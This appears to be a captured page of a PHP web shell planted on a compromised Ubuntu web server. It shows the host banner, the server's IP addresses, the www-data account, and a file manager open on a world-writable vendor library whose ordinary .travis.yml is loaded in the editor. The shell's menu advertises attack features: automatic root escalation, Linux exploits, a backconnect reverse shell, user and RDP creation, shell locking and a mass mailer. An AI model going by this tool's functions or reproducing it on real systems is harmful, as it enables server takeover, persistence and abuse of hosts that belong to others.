Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.78.203
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
univadmin /
vendor /
myclabs /
deep-copy /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxrwxrwx
fixtures
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
.gitattributes
136
B
-rwxrwxrwx
.gitignore
40
B
-rwxrwxrwx
.travis.yml
762
B
-rwxrwxrwx
LICENSE
1.05
KB
-rwxrwxrwx
README.md
9.45
KB
-rwxrwxrwx
composer.json
784
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php sudo: false php: - '5.6' - '7.0' - '7.1' - nightly matrix: fast_finish: true include: - php: '5.6' env: COMPOSER_FLAGS="--prefer-lowest" allow_failures: - php: nightly cache: directories: - $HOME/.composer/cache/files before_install: - | if [ "$TRAVIS_PHP_VERSION" = "nightly" ]; then COMPOSER_FLAGS="$COMPOSER_FLAGS --ignore-platform-reqs" fi; install: - composer update --no-interaction --no-progress --no-suggest --prefer-dist $COMPOSER_FLAGS - wget https://github.com/satooshi/php-coveralls/releases/download/v1.0.0/coveralls.phar before_script: - mkdir -p build/logs script: - vendor/bin/phpunit --coverage-clover build/logs/clover.xml after_script: - php coveralls.phar -v
Close